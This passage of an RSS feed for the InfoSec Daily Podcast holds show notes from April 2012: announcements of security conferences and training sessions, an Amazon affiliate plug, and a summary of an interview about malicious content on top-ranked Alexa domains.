	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><u><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">Interview</span><br />
	</u></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;">&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In this episode we interview Paul Royal, who is a research Scientist at Georgia Tech Information Security Center by day and a Research Consultant for Barracuda Labs at night/ &nbsp;Paul has performed research that we reported on in July of 2010 involving the </span><a href="http://en.wikipedia.org/wiki/Kraken_botnet"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Kraken</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> botnet (son-of-Kraken). &nbsp;&nbsp;Tonight we talk to Paul about his research titled &ldquo;Maliciousness in Top-ranked Alexa Domains.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">Read the report here: </span><a href="http://www.barracudalabs.com/wordpress/index.php/2012/03/28/maliciousness-in-top-ranked-alexa-domains/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.barracudalabs.com/wordpress/index.php/2012/03/28/maliciousness-in-top-ranked-alexa-domains/<br />
	</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size: 15px; font-family: Arial; color: rgb(0, 0, 0); background-color: transparent; font-weight: normal; font-style: normal; font-variant: normal; text-decoration: none; vertical-align: baseline;">See the graphic here: </span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.barracudalabs.com/goodsitesbad/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.barracudalabs.com/goodsitesbad/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-638-interview-with-paul-royal/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3732/0/infosec-daily-podcast-episode-638.mp3" length="17719675" type="audio/mpeg" />
		<itunes:duration>0:36:52</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 638 for April 5, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0n[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 638 for April 5, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
&#160;
Announcements:
Outerz0ne 8
	When: April 20-21, 2012
	Where: Wellesley Inn, Atlanta GA
http://www.outerz0ne.org 
&#160;
Linuxfest Northwest 2012
	When: Saturday, April 28-29, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
&#160;
AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center &#160;- Huntington, West Virginia
	http://www.appyide.org/
&#160;
LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA 
	http://www.sans.org/mentor/details.php?nid=28014
	&#160;
Social Engineering Training
When: July 21-24, 2012
	Where: Black Hat Vegas
When: August 20-24, 2012
	Where: &#160;Bristol, UK
When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD
http://www.social-engineer.com/social-engineer-training
&#160;
Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
&#160;
DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
&#160;
Skydogcon
	When: October 26-28
	Where: Hotel Preston in Nashville, TN 
	http://www.skydogcon.com 
&#160;
Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
&#160;
You don't have a sufficient version of Flash Player to display this animation.
&#160;
&#160;
Interview
	
&#160;
In this episode we interview Paul Royal, who is a research Scientist at Georgia Tech Information Security Center by day and a Research Consultant for Barracuda Labs at night/ &#160;Paul has performed research that we reported on in July of 2010 involving the Kraken botnet (son-of-Kraken). &#160;&#160;Tonight we talk to Paul about his research titled &#8220;Maliciousness in Top-ranked Alexa Domains.&#8221;
Read the report here: http://www.barracudalabs.com/wordpress/index.php/2012/03/28/maliciousness-in-top-ranked-alexa-domains/
	
See the graphic here: 
http://www.barracudalabs.com/goodsitesbad/
&#8230;</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 637 &#8211; @PentestLessons, Apple Java Update, SQLi Tools, DNS Resolvers, Millions Stolen, and Anonymous China</title>
		<link>http://www.isdpodcast.com/episode-637-pentestlessons-apple-java-update-sqli-tools-dns-resolvers-millions-stolen-and-anonymous-china</link>
		<comments>http://www.isdpodcast.com/episode-637-pentestlessons-apple-java-update-sqli-tools-dns-resolvers-millions-stolen-and-anonymous-china#comments</comments>
		<pubDate>Thu, 05 Apr 2012 00:48:55 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3728</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 637 for April 4, 2012. Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan. &#160; Announcements: Outerz0ne 8 When: April 20-21, 2012 Where: Wellesley Inn, Atlanta GA http://www.outerz0ne.org &#160; Linuxfest Northwest 2012 When: Saturday, April 28-29, 2012 Where: Bellingham Technical College &#8211; Bellingham, WA http://www.linuxfestnorthwest.org/ &#160; AIDE 2012 [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 637 for April 4, 2012. </span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Karthik Rangarajan.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Outerz0ne 8<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: April 20-21, 2012<br class="kix-line-break" /><br />
	Where: Wellesley Inn, Atlanta GA</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.outerz0ne.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.outerz0ne.org</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28-29, 2012<br class="kix-line-break" /><br />
	Where: Bellingham Technical College &#8211; Bellingham, WA<br class="kix-line-break" /><br />
	</span><a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012<br class="kix-line-break" /><br />
	Where: MU Forensic Science Center &nbsp;- Huntington, West Virginia<br class="kix-line-break" /><br />
	</span><a href="http://www.appyide.org/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.appyide.org/</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012<br class="kix-line-break" /><br />
	Where: Clarion Hotel &#8211; Anaheim, CA<br class="kix-line-break" /><br />
	</span><a href="http://www.layerone.org/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></p>
<p><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012<br class="kix-line-break" /><br />
	Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> <br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Bristol, UK</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012<br class="kix-line-break" /><br />
	When: July 23 &#8211; 24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas<br class="kix-line-break" /><br />
	</span><a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012<br class="kix-line-break" /><br />
	Where: Louisville, KY<br class="kix-line-break" /><br />
	</span><a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon</span><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br class="kix-line-break" /><br />
	When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com/"><span style="font-size:13px;font-family:Verdana;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Verdana;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>&nbsp;</p>
